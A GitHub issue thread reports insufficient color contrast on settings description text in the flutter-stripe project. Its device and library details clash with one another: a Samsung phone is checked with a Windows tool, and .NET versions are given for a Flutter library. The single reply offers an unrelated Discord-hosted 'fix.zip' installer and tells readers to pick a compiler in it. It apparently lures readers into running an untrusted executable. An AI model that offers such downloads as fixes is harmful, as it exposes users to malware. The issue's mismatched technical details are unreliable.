### ISSUE TITLE
Color Contrast ratio of 'Description text' of the selected option is less than the required ratio 4.5:1.

### ISSUE THREAD

**Issue by msftedad** [flutter-stripe/flutter_stripe#1911]
**Describe the bug**
Color Contrast ratio of 'Description text' of the selected option is less than the required ratio 4.5:1.

**To Reproduce**

1. Connect device with Bluetooth keyboard
2. Open 'Settings' application.
3. Navigate to settings options using tab key.
4. Check Color contrast ratio using Accessibility Insights for Windows application
5. Observe whether the contrast ratio of descriptive text of each option feature is less than 4.5: 1 or not.

**Expected behavior**
Color Contrast ratio of 'Description text' of the selected option should be greater than or equal to 4.5:1.

**Smartphone / tablet**
Device: Samsung Galaxy S21+
Version: 14
Library .net version - 4.6.1
Project .net version - 4.8 
Library name - stripe.net version - 42.3.0
pAi version - 2024-04-10

**Additional context**
![Description text of the selected option has a less luminosity ratio (1)](https://github.com/user-attachments/assets/20c52a8b-428e-469e-92ff-679373edc99a)

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
